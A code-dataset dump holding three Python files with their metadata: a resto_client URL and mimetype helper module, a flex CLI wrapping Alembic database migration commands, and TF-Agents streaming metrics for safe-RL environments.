<filename>resto_client/functions/utils.py<gh_stars>1-10 # -*- coding: utf-8 -*- """ .. admonition:: License Copyright 2019 CNES Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from mimetypes import guess_extension, MimeTypes from typing import Optional, Tuple, Union from urllib.parse import urlparse, urlunparse def contract_url(full_url: str) -> str: """ Contract a url to appear with ... :param full_url: full url to contract for printing :returns: contracted url """ url_lst = list(urlparse(full_url)) # delete params, query and fragment for i in [3, 4, 5]: url_lst[i] = '' # reduce url : path parts path_parts = url_lst[2].split('/') url_lst[2] = '/'.join((path_parts[0], '...', path_parts[-2], path_parts[-1])) contracted_url = urlunparse(url_lst) return contracted_url def is_valid_url(url: str) -> bool: """ Validate if the passed argument looks like a valid url. 
:param url: url to check :returns: True if the argument looks like a valid URL """ try: result = urlparse(url) return all([result.scheme, result.netloc]) except ValueError: return False def get_file_properties(content_type: str) -> Tuple[Optional[str], str, Union[str, None]]: """ Guess proper extension to use, even if charset is present in content_type and return correct content_type and encoding :param content_type: content_type stripped to check :returns: the file extension, mimetype and encoding """ mimetype = content_type split_content = content_type.split(';') for kind_of_mimetype in MimeTypes().types_map_inv: for key in kind_of_mimetype: if content_type.startswith(key): mimetype = key encoding = None if len(split_content) > 1: encoding = split_content[1] if '=' in encoding: split_encoding = split_content[1].split('=') if split_encoding[0].strip().lower() == 'charset': encoding = split_encoding[1] return (guess_extension(mimetype), mimetype, encoding)
<filename>resto_client/functions/utils.py<gh_stars>1-10 # -*- coding: utf-8 -*- """ .. admonition:: License Copyright 2019 CNES Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from mimetypes import guess_extension, MimeTypes from typing import Optional, Tuple, Union from urllib.parse import urlparse, urlunparse def contract_url(full_url: str) -> str: """ Contract a url to appear with ... :param full_url: full url to contract for printing :returns: contracted url """ url_lst = list(urlparse(full_url)) # delete params, query and fragment for i in [3, 4, 5]: url_lst[i] = '' # reduce url : path parts path_parts = url_lst[2].split('/') url_lst[2] = '/'.join((path_parts[0], '...', path_parts[-2], path_parts[-1])) contracted_url = urlunparse(url_lst) return contracted_url def is_valid_url(url: str) -> bool: """ Validate if the passed argument looks like a valid url. 
:param url: url to check :returns: True if the argument looks like a valid URL """ try: result = urlparse(url) return all([result.scheme, result.netloc]) except ValueError: return False def get_file_properties(content_type: str) -> Tuple[Optional[str], str, Union[str, None]]: """ Guess proper extension to use, even if charset is present in content_type and return correct content_type and encoding :param content_type: content_type stripped to check :returns: the file extension, mimetype and encoding """ mimetype = content_type split_content = content_type.split(';') for kind_of_mimetype in MimeTypes().types_map_inv: for key in kind_of_mimetype: if content_type.startswith(key): mimetype = key encoding = None if len(split_content) > 1: encoding = split_content[1] if '=' in encoding: split_encoding = split_content[1].split('=') if split_encoding[0].strip().lower() == 'charset': encoding = split_encoding[1] return (guess_extension(mimetype), mimetype, encoding)
en
0.777408
# -*- coding: utf-8 -*- .. admonition:: License Copyright 2019 CNES Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Contract a url to appear with ... :param full_url: full url to contract for printing :returns: contracted url # delete params, query and fragment # reduce url : path parts Validate if the passed argument looks like a valid url. :param url: url to check :returns: True if the argument looks like a valid URL Guess proper extension to use, even if charset is present in content_type and return correct content_type and encoding :param content_type: content_type stripped to check :returns: the file extension, mimetype and encoding
2.194863
2
flex/db/cli.py
centergy/flex
0
6627903
"""Command-line console for SQL database migrations and operations.

Thin wrappers around Alembic's migration commands (plus a few SQLAlchemy
database helpers), exposed through a flex ``Manager`` so they can be run
from the application CLI.  The command set mirrors Flask-Migrate's.
"""
import os
import argparse

from flex.core.cli import Manager, prompt_bool
from .utils import app_get_db_client
from flask import current_app
from .migrations import Config, migrations
from alembic import command

console = Manager(usage="Perform SQL database migrations and operations with SQLAlchemy.")


@console.command
def createdb(binds=None):
    """Creates the configured database and tables from sqlalchemy models."""
    # ``binds`` arrives from the CLI as a comma-separated string of bind names.
    binds = () if binds is None else binds.split(',')
    _dbclient().create_database(*binds)


@console.command
def dropdb(binds=None):
    """Drops the current sqlalchemy database."""
    binds = () if binds is None else binds.split(',')
    if prompt_bool("Sure you want to drop the database?"):
        _dbclient().drop_database(*binds)


# @console.command
# def recreatedb(create_tables=True, drop_tables=False):
#     """Recreates the database and tables (same as issuing 'drop_db' and then 'create_db')."""
#     dropdb(drop_tables)
#     createdb(create_tables)


# @console.command
# def createtables():
#     """Creates the configured database and tables from sqlalchemy models."""
#     _dbclient().create_all()


@console.command
def droptables():
    """Drops the current sqlalchemy database."""
    if prompt_bool("Sure you want to drop all tables in the database?"):
        _dbclient().drop_all()


# @console.command
# def recreatetables():
#     """Recreates database tables (same as issuing 'drop_tables' and then 'create_tables')."""
#     droptables()
#     createtables()


def _dbclient(app=None):
    """Returns the db client for ``app``, defaulting to the current Flask app."""
    return app_get_db_client(app or current_app)


@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is '.migrations')")
@console.option('--multidb', dest='multidb', action='store_true', default=False,
                help="Multiple databases migration (default is False)")
def init(directory=None, multidb=False):
    """Creates a new migration repository"""
    # Make sure the database itself exists before Alembic touches it.
    createdb()
    if directory is None:
        directory = migrations.directory
    config = Config()
    config.set_main_option('script_location', directory)
    config.config_file_name = os.path.join(directory, 'alembic.ini')
    # Give registered extensions a chance to adjust the Alembic config.
    config = migrations.migrate.call_configure_callbacks(config)
    if multidb:
        command.init(config, directory, 'flex-multidb')
    else:
        command.init(config, directory, 'flex')


@console.option('--rev-id', dest='rev_id', default=None,
                help='Specify a hardcoded revision id instead of generating one')
@console.option('--version-path', dest='version_path', default=None,
                help='Specify specific path from config for version file')
@console.option('--branch-label', dest='branch_label', default=None,
                help='Specify a branch label to apply to the new revision')
@console.option('--splice', dest='splice', action='store_true', default=False,
                help='Allow a non-head revision as the "head" to splice onto')
@console.option('--head', dest='head', default='head',
                help='Specify head revision or <branchname>@head to base new revision on')
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('--autogenerate', dest='autogenerate', action='store_true', default=False,
                help='Populate revision script with candidate migration operations, based on comparison of database to model')
@console.option('-m', '--message', dest='message', default=None, help='Revision message')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def revision(directory=None, message=None, autogenerate=False, sql=False,
             head='head', splice=False, branch_label=None, version_path=None,
             rev_id=None):
    """Create a new revision file."""
    config = migrations.migrate.get_config(directory)
    command.revision(config, message, autogenerate=autogenerate, sql=sql,
                     head=head, splice=splice, branch_label=branch_label,
                     version_path=version_path, rev_id=rev_id)


@console.option('--rev-id', dest='rev_id', default=None,
                help='Specify a hardcoded revision id instead of generating one')
@console.option('--version-path', dest='version_path', default=None,
                help='Specify specific path from config for version file')
@console.option('--branch-label', dest='branch_label', default=None,
                help='Specify a branch label to apply to the new revision')
@console.option('--splice', dest='splice', action='store_true', default=False,
                help='Allow a non-head revision as the "head" to splice onto')
@console.option('--head', dest='head', default='head',
                help='Specify head revision or <branchname>@head to base new revision on')
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('-m', '--message', dest='message', default=None)
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def migrate(directory=None, message=None, sql=False, head='head', splice=False,
            branch_label=None, version_path=None, rev_id=None):
    """Alias for 'revision --autogenerate'"""
    config = migrations.migrate.get_config(directory, opts=['autogenerate'])
    command.revision(config, message, autogenerate=True, sql=sql, head=head,
                     splice=splice, branch_label=branch_label,
                     version_path=version_path, rev_id=rev_id)


@console.option('revision', nargs='?', default='head', help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def edit(directory=None, revision='current'):
    """Edit current revision."""
    # NOTE(review): the CLI default is 'head' (decorator above) while the
    # signature default is 'current'; the signature default only matters for
    # direct Python calls.  Confirm which one is intended.
    config = migrations.migrate.get_config(directory)
    command.edit(config, revision)


@console.option('--rev-id', dest='rev_id', default=None,
                help='Specify a hardcoded revision id instead of generating one')
@console.option('--branch-label', dest='branch_label', default=None,
                help='Specify a branch label to apply to the new revision')
@console.option('-m', '--message', dest='message', default=None)
@console.option('revisions', nargs='+', help='one or more revisions, or "heads" for all heads')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def merge(directory=None, revisions='', message=None, branch_label=None, rev_id=None):
    """Merge two revisions together.  Creates a new migration file"""
    config = migrations.migrate.get_config(directory)
    command.merge(config, revisions, message=message,
                  branch_label=branch_label, rev_id=rev_id)


@console.option('--tag', dest='tag', default=None,
                help="Arbitrary 'tag' name - can be used by custom env.py scripts")
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('revision', nargs='?', default='head', help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
@console.option('-x', '--x-arg', dest='x_arg', default=None, action='append',
                help="Additional arguments consumed by custom env.py scripts")
def upgrade(directory=None, revision='head', sql=False, tag=None, x_arg=None):
    """Upgrade to a later version"""
    config = migrations.migrate.get_config(directory, x_arg=x_arg)
    command.upgrade(config, revision, sql=sql, tag=tag)


@console.option('--tag', dest='tag', default=None,
                help="Arbitrary 'tag' name - can be used by custom env.py scripts")
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('revision', nargs='?', default="-1", help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
@console.option('-x', '--x-arg', dest='x_arg', default=None, action='append',
                help="Additional arguments consumed by custom env.py scripts")
def downgrade(directory=None, revision='-1', sql=False, tag=None, x_arg=None):
    """Revert to a previous version"""
    config = migrations.migrate.get_config(directory, x_arg=x_arg)
    # Offline (--sql) mode needs an explicit start:end range for a relative
    # downgrade, so expand the bare '-1' into 'head:-1'.
    if sql and revision == '-1':
        revision = 'head:-1'
    command.downgrade(config, revision, sql=sql, tag=tag)


@console.option('revision', nargs='?', default="head", help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def show(directory=None, revision='head'):
    """Show the revision denoted by the given symbol."""
    config = migrations.migrate.get_config(directory)
    command.show(config, revision)


@console.option('-v', '--verbose', dest='verbose', action='store_true', default=False,
                help='Use more verbose output')
@console.option('-r', '--rev-range', dest='rev_range', default=None,
                help='Specify a revision range; format is [start]:[end]')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def history(directory=None, rev_range=None, verbose=False):
    """List changeset scripts in chronological order."""
    config = migrations.migrate.get_config(directory)
    command.history(config, rev_range, verbose=verbose)


@console.option('--resolve-dependencies', dest='resolve_dependencies',
                action='store_true', default=False,
                help='Treat dependency versions as down revisions')
@console.option('-v', '--verbose', dest='verbose', action='store_true', default=False,
                help='Use more verbose output')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def heads(directory=None, verbose=False, resolve_dependencies=False):
    """Show current available heads in the script directory"""
    config = migrations.migrate.get_config(directory)
    command.heads(config, verbose=verbose,
                  resolve_dependencies=resolve_dependencies)


@console.option('-v', '--verbose', dest='verbose', action='store_true', default=False,
                help='Use more verbose output')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def branches(directory=None, verbose=False):
    """Show current branch points"""
    config = migrations.migrate.get_config(directory)
    command.branches(config, verbose=verbose)


@console.option('--head-only', dest='head_only', action='store_true', default=False,
                help='Deprecated. Use --verbose for additional output')
@console.option('-v', '--verbose', dest='verbose', action='store_true', default=False,
                help='Use more verbose output')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def current(directory=None, verbose=False, head_only=False):
    """Display the current revision for each database."""
    config = migrations.migrate.get_config(directory)
    command.current(config, verbose=verbose, head_only=head_only)


@console.option('--tag', dest='tag', default=None,
                help="Arbitrary 'tag' name - can be used by custom env.py scripts")
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('revision', default=None, help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def stamp(directory=None, revision='head', sql=False, tag=None):
    """'stamp' the revision table with the given revision; don't run any migrations"""
    # NOTE(review): unlike the other commands this positional has no
    # nargs='?', so argparse will require it and the signature default is
    # only used for direct Python calls — confirm that is intended.
    config = migrations.migrate.get_config(directory)
    command.stamp(config, revision, sql=sql, tag=tag)
"""Perform SQL database migrations and operations with SQLAlchemy.

Flex console commands wrapping Alembic's migration machinery together with
a handful of SQLAlchemy database helpers.
"""
import os
import argparse

from flex.core.cli import Manager, prompt_bool
from .utils import app_get_db_client
from flask import current_app
from .migrations import Config, migrations
from alembic import command

console = Manager(usage="Perform SQL database migrations and operations with SQLAlchemy.")


@console.command
def createdb(binds=None):
    """Creates the configured database and tables from sqlalchemy models."""
    if binds is None:
        bind_names = ()
    else:
        bind_names = binds.split(',')
    _dbclient().create_database(*bind_names)


@console.command
def dropdb(binds=None):
    """Drops the current sqlalchemy database."""
    if binds is None:
        bind_names = ()
    else:
        bind_names = binds.split(',')
    if prompt_bool("Sure you want to drop the database?"):
        _dbclient().drop_database(*bind_names)


# @console.command
# def recreatedb(create_tables=True, drop_tables=False):
#     """Recreates the database and tables (same as issuing 'drop_db' and then 'create_db')."""
#     dropdb(drop_tables)
#     createdb(create_tables)


# @console.command
# def createtables():
#     """Creates the configured database and tables from sqlalchemy models."""
#     _dbclient().create_all()


@console.command
def droptables():
    """Drops the current sqlalchemy database."""
    if prompt_bool("Sure you want to drop all tables in the database?"):
        _dbclient().drop_all()


# @console.command
# def recreatetables():
#     """Recreates database tables (same as issuing 'drop_tables' and then 'create_tables')."""
#     droptables()
#     createtables()


def _dbclient(app=None):
    # Fall back to the active Flask application when none is supplied.
    if app is None:
        app = current_app
    return app_get_db_client(app)


@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is '.migrations')")
@console.option('--multidb', dest='multidb', action='store_true', default=False,
                help="Multiple databases migraton (default is False)")
def init(directory=None, multidb=False):
    """Creates a new migration repository"""
    createdb()
    if directory is None:
        directory = migrations.directory
    cfg = Config()
    cfg.set_main_option('script_location', directory)
    cfg.config_file_name = os.path.join(directory, 'alembic.ini')
    cfg = migrations.migrate.call_configure_callbacks(cfg)
    # Pick the Alembic template matching single- vs multi-database mode.
    template = 'flex-multidb' if multidb else 'flex'
    command.init(cfg, directory, template)


@console.option('--rev-id', dest='rev_id', default=None,
                help='Specify a hardcoded revision id instead of generating one')
@console.option('--version-path', dest='version_path', default=None,
                help='Specify specific path from config for version file')
@console.option('--branch-label', dest='branch_label', default=None,
                help='Specify a branch label to apply to the new revision')
@console.option('--splice', dest='splice', action='store_true', default=False,
                help='Allow a non-head revision as the "head" to splice onto')
@console.option('--head', dest='head', default='head',
                help='Specify head revision or <branchname>@head to base new revision on')
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('--autogenerate', dest='autogenerate', action='store_true', default=False,
                help='Populate revision script with candidate migration operations, based on comparison of database to model')
@console.option('-m', '--message', dest='message', default=None, help='Revision message')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def revision(directory=None, message=None, autogenerate=False, sql=False,
             head='head', splice=False, branch_label=None, version_path=None,
             rev_id=None):
    """Create a new revision file."""
    cfg = migrations.migrate.get_config(directory)
    rev_kwargs = dict(sql=sql, head=head, splice=splice,
                      branch_label=branch_label, version_path=version_path,
                      rev_id=rev_id)
    command.revision(cfg, message, autogenerate=autogenerate, **rev_kwargs)


@console.option('--rev-id', dest='rev_id', default=None,
                help='Specify a hardcoded revision id instead of generating one')
@console.option('--version-path', dest='version_path', default=None,
                help='Specify specific path from config for version file')
@console.option('--branch-label', dest='branch_label', default=None,
                help='Specify a branch label to apply to the new revision')
@console.option('--splice', dest='splice', action='store_true', default=False,
                help='Allow a non-head revision as the "head" to splice onto')
@console.option('--head', dest='head', default='head',
                help='Specify head revision or <branchname>@head to base new revision on')
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('-m', '--message', dest='message', default=None)
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def migrate(directory=None, message=None, sql=False, head='head', splice=False,
            branch_label=None, version_path=None, rev_id=None):
    """Alias for 'revision --autogenerate'"""
    cfg = migrations.migrate.get_config(directory, opts=['autogenerate'])
    rev_kwargs = dict(sql=sql, head=head, splice=splice,
                      branch_label=branch_label, version_path=version_path,
                      rev_id=rev_id)
    command.revision(cfg, message, autogenerate=True, **rev_kwargs)


@console.option('revision', nargs='?', default='head', help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def edit(directory=None, revision='current'):
    """Edit current revision."""
    cfg = migrations.migrate.get_config(directory)
    command.edit(cfg, revision)


@console.option('--rev-id', dest='rev_id', default=None,
                help='Specify a hardcoded revision id instead of generating one')
@console.option('--branch-label', dest='branch_label', default=None,
                help='Specify a branch label to apply to the new revision')
@console.option('-m', '--message', dest='message', default=None)
@console.option('revisions', nargs='+', help='one or more revisions, or "heads" for all heads')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def merge(directory=None, revisions='', message=None, branch_label=None, rev_id=None):
    """Merge two revisions together.  Creates a new migration file"""
    cfg = migrations.migrate.get_config(directory)
    command.merge(cfg, revisions, message=message, branch_label=branch_label,
                  rev_id=rev_id)


@console.option('--tag', dest='tag', default=None,
                help="Arbitrary 'tag' name - can be used by custom env.py scripts")
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('revision', nargs='?', default='head', help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
@console.option('-x', '--x-arg', dest='x_arg', default=None, action='append',
                help="Additional arguments consumed by custom env.py scripts")
def upgrade(directory=None, revision='head', sql=False, tag=None, x_arg=None):
    """Upgrade to a later version"""
    cfg = migrations.migrate.get_config(directory, x_arg=x_arg)
    command.upgrade(cfg, revision, sql=sql, tag=tag)


@console.option('--tag', dest='tag', default=None,
                help="Arbitrary 'tag' name - can be used by custom env.py scripts")
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('revision', nargs='?', default="-1", help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
@console.option('-x', '--x-arg', dest='x_arg', default=None, action='append',
                help="Additional arguments consumed by custom env.py scripts")
def downgrade(directory=None, revision='-1', sql=False, tag=None, x_arg=None):
    """Revert to a previous version"""
    cfg = migrations.migrate.get_config(directory, x_arg=x_arg)
    if sql and revision == '-1':
        revision = 'head:-1'
    command.downgrade(cfg, revision, sql=sql, tag=tag)


@console.option('revision', nargs='?', default="head", help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def show(directory=None, revision='head'):
    """Show the revision denoted by the given symbol."""
    cfg = migrations.migrate.get_config(directory)
    command.show(cfg, revision)


@console.option('-v', '--verbose', dest='verbose', action='store_true', default=False,
                help='Use more verbose output')
@console.option('-r', '--rev-range', dest='rev_range', default=None,
                help='Specify a revision range; format is [start]:[end]')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def history(directory=None, rev_range=None, verbose=False):
    """List changeset scripts in chronological order."""
    cfg = migrations.migrate.get_config(directory)
    command.history(cfg, rev_range, verbose=verbose)


@console.option('--resolve-dependencies', dest='resolve_dependencies',
                action='store_true', default=False,
                help='Treat dependency versions as down revisions')
@console.option('-v', '--verbose', dest='verbose', action='store_true', default=False,
                help='Use more verbose output')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def heads(directory=None, verbose=False, resolve_dependencies=False):
    """Show current available heads in the script directory"""
    cfg = migrations.migrate.get_config(directory)
    command.heads(cfg, verbose=verbose,
                  resolve_dependencies=resolve_dependencies)


@console.option('-v', '--verbose', dest='verbose', action='store_true', default=False,
                help='Use more verbose output')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def branches(directory=None, verbose=False):
    """Show current branch points"""
    cfg = migrations.migrate.get_config(directory)
    command.branches(cfg, verbose=verbose)


@console.option('--head-only', dest='head_only', action='store_true', default=False,
                help='Deprecated. Use --verbose for additional output')
@console.option('-v', '--verbose', dest='verbose', action='store_true', default=False,
                help='Use more verbose output')
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def current(directory=None, verbose=False, head_only=False):
    """Display the current revision for each database."""
    cfg = migrations.migrate.get_config(directory)
    command.current(cfg, verbose=verbose, head_only=head_only)


@console.option('--tag', dest='tag', default=None,
                help="Arbitrary 'tag' name - can be used by custom env.py scripts")
@console.option('--sql', dest='sql', action='store_true', default=False,
                help="Don't emit SQL to database - dump to standard output instead")
@console.option('revision', default=None, help="revision identifier")
@console.option('-d', '--directory', dest='directory', default=None,
                help="migration script directory (default is 'migrations')")
def stamp(directory=None, revision='head', sql=False, tag=None):
    """'stamp' the revision table with the given revision; don't run any migrations"""
    cfg = migrations.migrate.get_config(directory)
    command.stamp(cfg, revision, sql=sql, tag=tag)
en
0.602278
Creates the configured database and tables from sqlalchemy models. Drops the current sqlalchemy database. # @console.command # def recreatedb(create_tables=True, drop_tables=False): # """Recreates the database and tables (same as issuing 'drop_db' and then 'create_db').""" # dropdb(drop_tables) # createdb(create_tables) # @console.command # def createtables(): # """Creates the configured database and tables from sqlalchemy models.""" # _dbclient().create_all() Drops the current sqlalchemy database. # @console.command # def recreatetables(): # """Recreates database tables (same as issuing 'drop_tables' and then 'create_tables').""" # droptables() # createtables() Creates a new migration repository Create a new revision file. Alias for 'revision --autogenerate' Edit current revision. Merge two revisions together. Creates a new migration file Upgrade to a later version Revert to a previous version Show the revision denoted by the given symbol. List changeset scripts in chronological order. Show current available heads in the script directory Show current branch points Display the current revision for each database. 'stamp' the revision table with the given revision; don't run any migrations
2.641903
3
safemrl/utils/metrics.py
krishpop/google-research
0
6627904
<filename>safemrl/utils/metrics.py # coding=utf-8 # Copyright 2019 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Custom TFAgent PyMetric for minitaur and point-mass environments. AverageEarlyFailureMetric used for detecting fall count for minitaur env, and AverageFallenMetric and AverageSuccessMetric used for poit-mass envs. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import gin import numpy as np from tf_agents.metrics import py_metrics from tf_agents.utils import numpy_storage @gin.configurable class AverageEarlyFailureMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, max_episode_len=500, name='AverageEarlyFailure', buffer_size=10, batch_size=None): """Creates an AverageEnvObsDict.""" self._np_state = numpy_storage.NumpyState() self._max_episode_len = max_episode_len # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.episode_steps = np.array(0, dtype=np.int32) super(AverageEarlyFailureMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.episode_steps = np.zeros(shape=(batch_size,), dtype=np.int32) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. 
Args: trajectory: a tf_agents.trajectory.Trajectory. """ episode_steps = self._np_state.episode_steps is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) episode_steps[not_last] += 1 if len(is_last[0]) > 0: self.add_to_buffer(episode_steps[is_last] < self._max_episode_len) episode_steps[is_last] = 0 @gin.configurable class AverageFallenMetric(py_metrics.StreamingMetric): """Computes average fallen rate for PointMass envs in buffer_size episodes.""" def __init__(self, dtype=np.bool, name='AverageFallen', buffer_size=10, batch_size=None): """Creates an AverageFallenMetric.""" # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._dtype = dtype super(AverageFallenMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_boundary()) if len(is_last[0]) > 0: self.add_to_buffer(trajectory.observation['fallen'][is_last]) @gin.configurable class AverageSuccessMetric(py_metrics.StreamingMetric): """Computes average success rate for PointMass env in buffer_size episodes.""" def __init__(self, name='AverageSuccess', buffer_size=10, batch_size=None): """Creates an AverageSuccessMetric.""" # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). super(AverageSuccessMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. 
""" is_last = np.where(trajectory.is_last()) if len(is_last[0]) > 0: succ = np.logical_and( np.logical_not(trajectory.observation['fallen'][is_last]), trajectory.reward[is_last] > 0.) self.add_to_buffer(succ) @gin.configurable class MinitaurAverageSpeedMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, name='MinitaurAverageSpeed', buffer_size=10, batch_size=None): """Creates a metric for minitaur speed stats.""" self._np_state = numpy_storage.NumpyState() # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.episode_steps = np.array(0, dtype=float) self._np_state.speed = np.array(0, dtype=float) super(MinitaurAverageSpeedMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.episode_steps = np.zeros(shape=(batch_size,), dtype=np.int32) self._np_state.speed = np.zeros(shape=(batch_size,), dtype=float) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. 
""" episode_steps = self._np_state.episode_steps total_speed = self._np_state.speed is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) total_speed[not_last] += trajectory.observation['current_vel'][not_last] episode_steps[not_last] += 1 if len(is_last[0]) > 0: self.add_to_buffer(total_speed[is_last]/episode_steps[is_last]) episode_steps[is_last] = 0 total_speed[is_last] = 0 @gin.configurable class MinitaurAverageMaxSpeedMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, name='MinitaurAverageMaxSpeed', buffer_size=10, batch_size=None): """Creates a metric for minitaur speed stats.""" self._np_state = numpy_storage.NumpyState() # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.speed = np.array(0, dtype=float) super(MinitaurAverageMaxSpeedMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.speed = np.zeros(shape=(batch_size,), dtype=float) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ max_speed = self._np_state.speed is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) if len(not_last[0]) > 0: max_speed[not_last] = np.max([trajectory.observation['current_vel'][not_last], max_speed[not_last]], axis=0) if len(is_last[0]) > 0: self.add_to_buffer(max_speed[is_last]) max_speed[is_last] = 0 @gin.configurable class CubeAverageScoreMetric(py_metrics.StreamingMetric): """Computes average score at end of trajectory""" def __init__(self, env, name='AverageScore', buffer_size=10, batch_size=None): """ Creates an CubeAverageScoreMetric. 
Args: env: Instance of gym.Env that implements get_score() which updates the metric name: metric name buffer_size: number of episodes to compute average over """ # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._env = env batch_size = batch_size or len(env) self._np_state = numpy_storage.NumpyState() self._np_state.adds_to_buff = np.array(0, dtype=float) # used so that buff is not over-populated by returned trajectories from short episodes super(CubeAverageScoreMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_last()) if len(is_last[0]) > 0: for idx in is_last[0]: self.add_to_buffer([self._env[idx].last_score]) self._np_state.adds_to_buff[idx] += 1
